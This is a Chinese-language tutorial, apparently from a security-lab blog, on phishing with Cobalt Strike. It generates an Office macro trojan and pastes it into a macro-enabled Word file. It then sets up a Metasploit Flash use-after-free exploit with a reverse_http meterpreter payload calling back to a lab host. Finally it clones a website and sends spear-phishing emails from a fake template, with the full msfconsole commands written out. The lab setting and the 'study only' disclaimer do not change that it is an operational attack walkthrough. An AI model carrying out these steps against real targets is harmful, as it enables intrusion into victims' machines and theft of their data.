網上有關於office宏病毒的釣魚文章,生成的宏病毒很容易被殺軟隔離,我們先簡單介紹下這種方式的運用,如下是利用office宏進行釣魚的流程:
首先,在cobalt strike中需要創建一個監聽器:
在Listeners中,選擇add創建監聽
我們在創建監聽的時候會發現有多種 payload 供選擇。其中 foreign 指外部監聽,beacon指cobalt strike內部監聽,其他的類型根據http和https以及smb等自行可以選擇,看你主要用到哪種。
這裡,我們創建如下監聽:host和port指cobalt strike的服務器地址和監聽端口,這裡因為我只部署了一臺cobalt strike團隊服務器,固選擇部署的這臺即可,端口可以給非佔用的任意端口。
下面我們來生成一個宏病毒,如圖所示:
在cobalt strike中生成利用程序木馬等在attackes->Packages選項中。以下是每個選項的作用:
<code>HTML Application:生成惡意的HTA木馬文件MS Office Macro:生成office宏病毒文件Payload Generator:生成各種語言版本的payloadUSB/CD AutoPlay:生成利用自動播放運行的木馬文件 Windows Dropper:捆綁器,能夠對文檔類進行捆綁 Windows Executable:生成可執行exe木馬 Windows Executable(S):生成無狀態的可執行exe木馬 /<code>
選擇MS Office Macro選項,生成宏病毒。Listener選擇我們第一步創建的監聽鏈接
點擊Generate後,界面如下:選擇Copy Macro,至此,在我們的剪貼板中複製了一串宏代碼
啟用office,在office中視圖模塊選擇宏,如圖所示:
創建一個宏,如圖所示:
將生成的宏代碼,複製到office宏中,如圖所示:
保存該文件,保存的類型選擇啟用的宏Word文檔。(office宏默認是關閉的)
發現生成的該文件很容易被殺軟監測出來,並處理掉,加上它的侷限性,在外網實際中意義不大,在內網用用效果可能還好。這裡給大家推薦一篇TideSec安全團隊寫的一篇文章,裡面有說到利用宏創建持久性後門,這裡就不贅述了。鏈接地址:https://mp.weixin.qq.com/s/lhg71lVHfp9PY1m8sYXA_A
那麼下面給大家介紹一種可能實際用到的方式:
實驗準備階段:
電腦虛擬機搭建的郵件服務器地址:10.10.10.133
Cobalt strike團隊服務器地址:10.10.10.128
Kali虛擬機地址:10.10.10.128
這裡我們應用到一個flash插件漏洞的payloads:adobe_flash_hacking_team_uaf
通過cobalt strike結合metasploit進行實驗,如下:
通過kali啟用metasploit。配置如下信息:
<code>use exploit/multi/browser/adobe_flash_hacking_team_uaf set payload windows/meterpreter/reverse_httpset lhost 10.10.10.128set lport 80set disablepayloadhandler trueset prependmigrate trueexploit –j/<code>
執行後如圖所示,會得到一個利用地址,記錄該地址:
http://10.10.10.128:8080/Iw9ycnRjSC
接下來為了方便釣魚郵件的內容偽造的真實,我們通過cobalt strike克隆一個網站。
如圖所示,進入Web-Drive-by選項選擇Clone Site。這裡說明一下每個選項的含義:
Manage:對開啟的web服務進行管理 Clone Site:克隆網站,可以記錄受害者提交的數據 Host File:提供一個文件下載,可以修改Mime信息 Signed Applet Attack:使用java自簽名的程序進行釣魚攻擊 Smart Applet Attack:自動檢測java版本並進行攻擊,針對Java 1.6.0_45以下以及Java 1.7.0_21以下版本 System Profiler:用來獲取一些系統信息,比如系統版本,Flash版本,瀏覽器版本等
配置信息如下:
其中attack就是我們metasploit中生成的地址鏈接
這裡返回了利用flash插件漏洞生成的一個克隆鏈接。現在我們進行郵件偽造。
1、kali下創建目標清單:leafpad targets.txt
注意中間的紅線用TAB鍵進行分割,這裡的test是姓名。可以是多個郵件地址,每一行一個郵件地址,用TAB鍵分割。後半部分是姓名。
2、創建一個釣魚模板:使用自己的網絡郵箱,show original顯示源代碼,這就是我們的“釣魚”模板。將內容複製到剪貼板,cat >rsa.template,右鍵paste粘貼。
QQ的郵箱在顯示郵件原文可以看到源代碼。Foxmail可以在更多選項中的查看源碼找到。如圖所示:
在cobalt strike中選擇attack->spear Phish
點擊send進行發送
郵件發送成功,如果客戶端存在flash漏洞,等待點擊郵件模板裡的鏈接即可跳轉到我們的http://10.10.10.128/search地址,並通過flash漏洞,獲取到該終端的權限,該終端會成功上線。
注意:因為郵件服務器和CS團隊服務器都是我在本地虛擬機搭建的,不在公網上的。所以暫時未模擬到真實郵件。
本文只用於學習研究,請勿用作其他非法用途
閱讀更多 KillBoy安全實驗室 的文章